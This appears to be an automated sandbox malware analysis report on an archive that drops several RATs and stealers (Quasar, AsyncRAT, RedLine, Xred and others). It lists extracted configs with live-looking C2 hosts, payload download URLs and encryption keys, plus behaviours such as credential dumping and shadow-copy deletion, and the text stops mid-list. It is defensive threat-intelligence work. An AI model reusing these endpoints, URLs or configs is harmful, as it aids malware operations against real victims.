Analysis
-
max time kernel
186s -
max time network
487s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-01-2025 17:32
Behavioral task
behavioral1
Sample
New Text Document mod.exe.zip
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
New Text Document mod.exe.zip
Resource
win10ltsc2021-20250113-en
Behavioral task
behavioral4
Sample
New Text Document mod.exe.zip
Resource
win11-20241007-en
Errors
General
-
Target
New Text Document mod.exe.zip
-
Size
392KB
-
MD5
209c2bed74ce311f3de2c3040f5cbd8b
-
SHA1
676dbe2bbf178ca27210c8a2e37aa9652f4e17d5
-
SHA256
672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6
-
SHA512
44b5207ce1a79c220ed014b7803ba4f3b89b0aa81f2232e152da9e5c8004c164a281d8806843a10590e3c55b902ef5e3f359bc117b80b11d052fe60324709324
-
SSDEEP
6144:PiyQGVN3t3bmwUUoI7a+OjFjjGFEduVVZ4vELL2VzCGb49pRYCEheDmDUKUQWCCJ:P/HfRx7aNFXuhTL2I70SmpXCqry
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
redline
1V
195.177.92.88:1912
Extracted
quasar
1.4.1
Office04
other-little.gl.at.ply.gg:11758
Extazz24535-22930.portmap.host:22930
llordiWasHere-55715.portmap.host:55715
fbbc34bd-7320-405e-aebb-d4c666ee475f
-
encryption_key
FEA99DED4EFE826DE2850621FD7919E62525FD26
-
install_name
DirectX111.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
DirectX
-
subdirectory
SubDir
Extracted
asyncrat
0.5.8
Default
0.tcp.in.ngrok.io:10147
38.240.58.195:6606
172.204.136.22:1604
Q52IWD1RYgpZ
-
delay
3
-
install
false
-
install_file
Listopener.exe
-
install_folder
%AppData%
Extracted
redline
Standoff
89.23.101.77:1912
Extracted
quasar
1.3.0.0
Office04
20.107.53.25:25535
QSR_MUTEX_zQ0poF2lHhCSZKSUZ3
-
encryption_key
E2xbpJ93MnABcIqioTDL
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
redline
first
212.56.41.77:1912
Extracted
quasar
1.3.0.0
sigorta
217.195.197.170:1604
QSR_MUTEX_9WjAcLINYji1uqfzRt
-
encryption_key
B2vTTMiPGqHXv2xzSGYH
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
quasar
1.4.1
RuntimeBroker
qrpn9be.localto.net:2810
fc5edab1-6e8f-4963-98aa-bd077e08750f
-
encryption_key
F749DCAC94A1FC3102D2B0CFBBFCB76086F86568
-
install_name
RuntimeBroker.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
RuntimeBroker
-
subdirectory
a7
Extracted
quasar
1.4.1
ROBLOX EXECUTOR
192.168.50.1:4782
10.0.0.113:4782
LETSQOOO-62766.portmap.host:62766
89.10.178.51:4782
90faf922-159d-4166-b661-4ba16af8650e
-
encryption_key
FFEE70B90F5EBED6085600C989F1D6D56E2DEC26
-
install_name
windows 3543.exe
-
log_directory
roblox executor
-
reconnect_delay
3000
-
startup_key
windows background updater
-
subdirectory
windows updater
Extracted
asyncrat
0.5.7B
Default
wzt5xcg.localto.net:1604
wzt5xcg.localto.net:5274
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_file
KYGOClient.exe
-
install_folder
%AppData%
Extracted
quasar
1.4.1
ZJEB
VIPEEK1990-25013.portmap.host:25013
ad21b115-2c1b-40cb-adba-a50736b76c21
-
encryption_key
3EBA8BC34FA983893A9B07B831E7CEB183F7492D
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Security Service
-
subdirectory
SubDir
Extracted
quasar
1.4.0.0
Office
85.192.29.60:5173
45.136.51.217:5173
QAPB6w0UbYXMvQdKRF
-
encryption_key
pxC3g4rfVijQxK1hMGwM
-
install_name
csrss.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
NET framework
-
subdirectory
SubDir
Extracted
redline
@glowfy0
91.214.78.86:1912
Signatures
-
Asyncrat family
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral2/files/0x00070000000240a9-9585.dat family_vidar_v7 -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0007000000024072-9162.dat family_xworm behavioral2/files/0x0007000000024076-9184.dat family_xworm -
Meduza Stealer payload 2 IoCs
resource yara_rule behavioral2/memory/5628-1837-0x0000000000400000-0x0000000000526000-memory.dmp family_meduza behavioral2/memory/5628-1836-0x0000000000400000-0x0000000000526000-memory.dmp family_meduza -
Meduza family
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
description flow ioc Process 440 api.ipify.org Process not Found 441 api.ipify.org Process not Found 650 api.ipify.org Process not Found 868 ip-api.com Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe 589 ip-api.com Process not Found -
Quasar family
-
Quasar payload 23 IoCs
resource yara_rule behavioral2/memory/2888-1762-0x00000000005F0000-0x0000000000914000-memory.dmp family_quasar behavioral2/memory/7224-3670-0x00000000005A0000-0x00000000005FE000-memory.dmp family_quasar behavioral2/memory/7868-3737-0x0000000000BA0000-0x0000000000BFE000-memory.dmp family_quasar behavioral2/memory/8000-3761-0x00000000004F0000-0x0000000000814000-memory.dmp family_quasar behavioral2/files/0x0007000000023e20-3801.dat family_quasar behavioral2/memory/7768-3811-0x00000000000E0000-0x0000000000404000-memory.dmp family_quasar behavioral2/files/0x0008000000023e1c-3822.dat family_quasar behavioral2/memory/5712-3849-0x0000000000150000-0x0000000000474000-memory.dmp family_quasar behavioral2/memory/9316-5686-0x0000000000060000-0x0000000000384000-memory.dmp family_quasar behavioral2/files/0x0007000000023f13-6305.dat family_quasar behavioral2/memory/3532-6505-0x0000000000250000-0x0000000000574000-memory.dmp family_quasar behavioral2/memory/10448-6850-0x0000000000170000-0x0000000000494000-memory.dmp family_quasar behavioral2/files/0x0007000000023f76-6915.dat family_quasar behavioral2/memory/9288-6979-0x0000000000620000-0x0000000000944000-memory.dmp family_quasar behavioral2/files/0x000500000001db60-7109.dat family_quasar behavioral2/memory/872-7243-0x0000000000760000-0x0000000000A84000-memory.dmp family_quasar behavioral2/files/0x000700000002401d-7328.dat family_quasar behavioral2/memory/8128-7345-0x0000000000700000-0x000000000074E000-memory.dmp family_quasar behavioral2/memory/7232-7343-0x0000000000600000-0x0000000000924000-memory.dmp family_quasar behavioral2/memory/2524-7504-0x00000000006F0000-0x000000000073E000-memory.dmp family_quasar behavioral2/memory/7612-7556-0x0000000000D90000-0x00000000010B4000-memory.dmp family_quasar behavioral2/files/0x0008000000023ef2-5611.dat family_quasar behavioral2/files/0x0007000000024077-9301.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
resource yara_rule behavioral2/files/0x000300000001e0f1-1226.dat family_redline behavioral2/memory/5204-1233-0x0000000000070000-0x00000000000C2000-memory.dmp family_redline behavioral2/memory/6980-3665-0x0000000000D00000-0x0000000000D52000-memory.dmp family_redline behavioral2/memory/7380-3674-0x00000000004B0000-0x0000000000502000-memory.dmp family_redline behavioral2/memory/7560-7557-0x00000000009B0000-0x0000000000A02000-memory.dmp family_redline -
Redline family
-
Vidar family
-
XMRig Miner payload 4 IoCs
resource yara_rule behavioral2/files/0x0007000000023e01-3713.dat family_xmrig behavioral2/files/0x0007000000023e01-3713.dat xmrig behavioral2/files/0x0007000000023e18-6429.dat family_xmrig behavioral2/files/0x0007000000023e18-6429.dat xmrig -
Xmrig family
-
Xred family
-
Xworm family
-
Async RAT payload 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023df9-4143.dat family_asyncrat behavioral2/files/0x0016000000023fdc-7621.dat family_asyncrat behavioral2/files/0x000900000002402a-7733.dat family_asyncrat -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
mimikatz is an open source tool to dump credentials on Windows 1 IoCs
resource yara_rule behavioral2/files/0x000500000001e75a-3601.dat mimikatz -
Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs
Powershell Invoke Web Request.
pid Process 9992 powershell.exe 10576 powershell.EXE 8892 powershell.exe 5812 powershell.exe 4780 powershell.exe 6616 powershell.exe 7724 powershell.exe 5460 powershell.exe 7104 powershell.exe 6548 powershell.exe 3424 powershell.exe 11156 powershell.exe 1056 powershell.exe 2732 powershell.exe 816 powershell.exe 5632 powershell.exe 7624 powershell.exe 9996 powershell.exe -
Contacts a large (565) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 4 IoCs
pid Process 7908 netsh.exe 4892 netsh.exe 11232 netsh.exe 7900 netsh.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation ._cache_New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation Synaptics.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation ._cache_New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation ._cache_Synaptics.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation gem1.exe -
Executes dropped EXE 13 IoCs
pid Process 4636 New Text Document mod.exe 2436 ._cache_New Text Document mod.exe 2380 Synaptics.exe 5276 ._cache_Synaptics.exe 5204 build.exe 6008 New Text Document mod.exe 6080 ._cache_New Text Document mod.exe 2888 voidware_loader.exe 4260 DirectX111.exe 2024 gem1.exe 5628 gem1.exe 5448 gem2.exe 3804 Lightshot.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe -
Loads dropped DLL 4 IoCs
pid Process 2380 Synaptics.exe 2380 Synaptics.exe 6008 New Text Document mod.exe 6008 New Text Document mod.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" New Text Document mod.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 20 IoCs
flow ioc 674 raw.githubusercontent.com 88 drive.google.com 415 drive.google.com 566 raw.githubusercontent.com 607 raw.githubusercontent.com 385 drive.google.com 567 0.tcp.in.ngrok.io 788 raw.githubusercontent.com 822 0.tcp.in.ngrok.io 89 drive.google.com 357 raw.githubusercontent.com 756 raw.githubusercontent.com 763 drive.google.com 549 raw.githubusercontent.com 565 raw.githubusercontent.com 1260 0.tcp.in.ngrok.io 86 drive.google.com 90 drive.google.com 356 raw.githubusercontent.com 484 drive.google.com -
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 650 api.ipify.org 868 ip-api.com 440 api.ipify.org 441 api.ipify.org 589 ip-api.com -
Power Settings 1 TTPs 28 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 5288 powercfg.exe 10020 powercfg.exe 3332 powercfg.exe 5740 powercfg.exe 5224 powercfg.exe 2852 powercfg.exe 4996 cmd.exe 4392 powercfg.exe 5796 powercfg.exe 7680 powercfg.exe 6516 powercfg.exe 6492 powercfg.exe 6248 powercfg.exe 3972 powercfg.exe 4544 powercfg.exe 10208 powercfg.exe 11060 powercfg.exe 10412 powercfg.exe 6488 powercfg.exe 6504 powercfg.exe 3152 powercfg.exe 6652 powercfg.exe 4872 powercfg.exe 5056 powercfg.exe 6700 powercfg.exe 2732 powercfg.exe 224 powercfg.exe 8504 powercfg.exe -
Program crash 12 IoCs
pid pid_target Process procid_target 5700 2024 WerFault.exe 161 8888 8296 WerFault.exe 403 8836 4928 WerFault.exe 399 3372 8936 WerFault.exe 417 8892 8500 WerFault.exe 407 9088 9332 WerFault.exe 9988 9548 WerFault.exe 585 8676 10936 WerFault.exe 7480 10936 WerFault.exe 705 8708 9204 WerFault.exe 731 2932 8608 WerFault.exe 461 3680 3080 WerFault.exe 769 -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe gem2.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2024 set thread context of 5628 2024 gem1.exe 163 PID 5448 set thread context of 3828 5448 gem2.exe 192 -
resource yara_rule behavioral2/files/0x000c00000001e9c2-3434.dat upx behavioral2/memory/6452-3436-0x00007FF661870000-0x00007FF661887000-memory.dmp upx behavioral2/memory/6452-3482-0x00007FF661870000-0x00007FF661887000-memory.dmp upx behavioral2/memory/8188-7168-0x00007FFB33BF0000-0x00007FFB34255000-memory.dmp upx behavioral2/memory/8188-7475-0x00007FFB33BF0000-0x00007FFB34255000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Launches sc.exe 36 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 9988 sc.exe 4340 sc.exe 7340 sc.exe 6848 sc.exe 10464 sc.exe 4132 sc.exe 6748 sc.exe 1160 sc.exe 11096 sc.exe 1248 sc.exe 4516 sc.exe 5188 sc.exe 5744 sc.exe 5796 sc.exe 6680 sc.exe 2856 sc.exe 10828 sc.exe 5676 sc.exe 9824 sc.exe 2692 sc.exe 6172 sc.exe 6568 sc.exe 2524 sc.exe 5668 sc.exe 10696 sc.exe 3992 sc.exe 2852 sc.exe 9340 sc.exe 736 sc.exe 6768 sc.exe 6620 sc.exe 6800 sc.exe 6172 sc.exe 10956 sc.exe 4868 sc.exe 4196 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gem1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gem1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 8 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5756 PING.EXE 4788 PING.EXE 2748 PING.EXE 8392 PING.EXE 6600 PING.EXE 4264 cmd.exe 4616 PING.EXE 1224 PING.EXE -
NSIS installer 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023e28-6650.dat nsis_installer_1 behavioral2/files/0x0007000000023e28-6650.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 23 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Kills process with taskkill 2 IoCs
pid Process 5132 taskkill.exe 11116 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 44003100000000002d5a6b8c10006100340009000400efbe2d5a6a8c2d5a6b8c2e000000eee001000000030000000000000000000000000000001a7a1c006100000010000000 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "2" firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local 